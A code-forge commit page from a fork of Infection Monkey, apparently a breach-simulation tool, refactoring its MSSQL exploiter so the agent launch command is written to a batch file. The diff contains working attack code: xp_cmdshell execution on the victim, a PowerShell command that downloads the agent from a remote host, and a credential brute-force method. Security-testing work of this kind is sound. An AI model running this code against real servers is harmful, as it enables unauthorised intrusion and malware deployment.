p34709852
/
monkey
forked from p15670423/monkey
1
0
Fork 1
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Refactor MSSQL run agent commands 

Remove the dependency on the MSSQLLimitedSizePayload and use simple
methods like "_write_command_to_batch_file()".
This commit is contained in:
Mike Salvatore 2022-06-14 12:51:43 -04:00
parent b2aa8333c3
commit f349e1a334
1 changed files with 7 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
monkey/infection_monkey/exploit/mssqlexec.py
View File

@ -36,7 +36,6 @@ class MSSQLExploiter(HostExploiter):
XP_CMDSHELL_COMMAND_START = "xp_cmdshell '" XP_CMDSHELL_COMMAND_START = "xp_cmdshell '"
XP_CMDSHELL_COMMAND_END = "'" XP_CMDSHELL_COMMAND_END = "'"
EXPLOIT_COMMAND_PREFIX = "<nul set /p="
MONKEY_DOWNLOAD_COMMAND = ( MONKEY_DOWNLOAD_COMMAND = (
"powershell (new-object System.Net.WebClient)." "powershell (new-object System.Net.WebClient)."
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
@ -117,14 +116,13 @@ class MSSQLExploiter(HostExploiter):
self.run_mssql_commands(array_of_commands) self.run_mssql_commands(array_of_commands)
def run_monkey(self, monkey_path_on_victim: PureWindowsPath): def run_monkey(self, monkey_path_on_victim: PureWindowsPath):
monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim) self._write_agent_launch_command_to_batch_file(monkey_path_on_victim)
logger.debug(
f"Launching the agent: {monkey_launch_command.prefix} -- "
f"{monkey_launch_command.command} -- {monkey_launch_command.suffix}"
)
self.run_mssql_command(monkey_launch_command)
self.run_payload_file() self.run_payload_file()
def _write_agent_launch_command_to_batch_file(self, monkey_path_on_victim):
agent_launch_command = self.get_monkey_launch_command(monkey_path_on_victim)
self._write_command_to_batch_file(agent_launch_command)
def run_mssql_commands(self, cmds): def run_mssql_commands(self, cmds):
for cmd in cmds: for cmd in cmds:
logger.debug(f"Running command on SQL Server: {cmd}") logger.debug(f"Running command on SQL Server: {cmd}")
@ -170,17 +168,11 @@ class MSSQLExploiter(HostExploiter):
sleep(MSSQLExploiter.QUERY_BUFFER) sleep(MSSQLExploiter.QUERY_BUFFER)
def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath): def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath):
# Form monkey's launch command
monkey_args = build_monkey_commandline( monkey_args = build_monkey_commandline(
self.host, self.current_depth - 1, monkey_path_on_victim self.host, self.current_depth - 1, monkey_path_on_victim
) )
suffix = ">{}".format(self.payload_file_path)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX return f"{monkey_path_on_victim} {DROPPER_ARG} {monkey_args}"
return MSSQLLimitedSizePayload(
command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args),
prefix=prefix,
suffix=suffix,
)
def brute_force(self, host, port, users_passwords_pairs_list): def brute_force(self, host, port, users_passwords_pairs_list):
""" """